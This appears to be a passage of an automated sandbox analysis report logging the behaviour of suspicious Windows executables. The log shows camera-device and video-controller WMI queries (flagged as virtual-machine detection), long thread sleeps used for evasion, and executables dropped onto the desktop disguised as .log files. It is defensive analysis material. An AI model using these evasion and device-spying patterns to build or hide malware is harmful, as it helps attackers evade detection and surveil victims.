                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeMemory allocated: 1A90000 memory reserve | memory write watchJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeMemory allocated: 1B520000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\uAsLgsGzSk.exeMemory allocated: FB0000 memory reserve | memory write watch
                                    Source: C:\Recovery\uAsLgsGzSk.exeMemory allocated: 1A9A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\uAsLgsGzSk.exeMemory allocated: 2E70000 memory reserve | memory write watch
                                    Source: C:\Recovery\uAsLgsGzSk.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeMemory allocated: 2E20000 memory reserve | memory write watch
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeMemory allocated: 1B010000 memory reserve | memory write watch
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\uAsLgsGzSk.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\uAsLgsGzSk.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 600000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 599891
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 599766
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 3600000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 598903
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 598266
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 597516
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596985
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596782
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596422
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596266
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596032
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595844
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595593
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595369
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595078
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594891
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594360
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594063
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593860
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593328
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 592750
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 592547
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 592094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 591735
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 591504
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 591219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 590953
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 590641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 590203
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 589953
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 589516
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 589000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 588782
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 588407
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 588059
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 587597
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 587235
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586925
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586752
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586547
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586384
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 300000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586051
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585885
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585719
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585532
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585356
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585192
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585047
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584875
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584688
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584485
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584321
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584150
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583846
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583684
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583573
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583438
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583282
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583146
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583015
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582905
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582797
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582687
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582578
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582461
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582348
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582091
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581966
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581859
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581749
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581531
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581422
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581313
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581203
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580969
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580860
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580735
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580516
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580391
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580272
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580103
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579997
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579884
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579779
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579672
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579563
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579453
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579324
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578983
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578874
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578766
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578529
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4913Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4536
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4104
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3992
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWindow / User API: threadDelayed 5158
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWindow / User API: threadDelayed 4236
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\htcPaTVC.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\IitSDvGY.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\CvvLBlqK.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\zHJVyCcw.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\LqKTzAAu.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\qeoNTMEG.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\FyhuXVvF.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\eIxzTFKJ.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\hnxxzxgb.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\JwbtnRPV.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\vJjMMWBx.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\QdcRcxPi.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\maPwcuvP.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\mlFoDzaq.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\GvICsVKA.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\NVLRgsWM.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\zIxCDFUn.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\vPOensqX.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\cIDyHnkk.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\qTMMgMAe.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeDropped PE file which has not been started: C:\Users\user\Desktop\xRAMIbuT.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\HupKRiKa.logJump to dropped file
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23776
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe TID: 7628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664Thread sleep count: 4913 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep count: 4416 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1068Thread sleep count: 4536 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 4104 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep count: 3992 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep time: -3689348814741908s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\uAsLgsGzSk.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\uAsLgsGzSk.exe TID: 3336Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 7868Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -33204139332677172s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -600000s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -599891s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -599766s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1608Thread sleep time: -39600000s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -598903s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -598266s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -597516s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -596985s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -596782s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -596625s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -596422s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -596266s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -596032s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -595844s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -595593s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -595369s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -595078s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -594891s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -594625s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -594360s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -594063s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -593860s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -593625s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -593328s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -593094s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -592750s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -592547s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -592094s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -591735s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -591504s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -591219s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -590953s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -590641s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -590203s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -589953s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -589516s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -589000s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -588782s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -588407s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -588059s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -587597s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -587235s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -586925s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -586752s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -586547s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -586384s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -586219s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1608Thread sleep time: -600000s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -586051s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -585885s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -585719s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -585532s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -585356s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -585192s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -585047s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -584875s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -584688s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -584485s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -584321s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -584150s >= -30000s
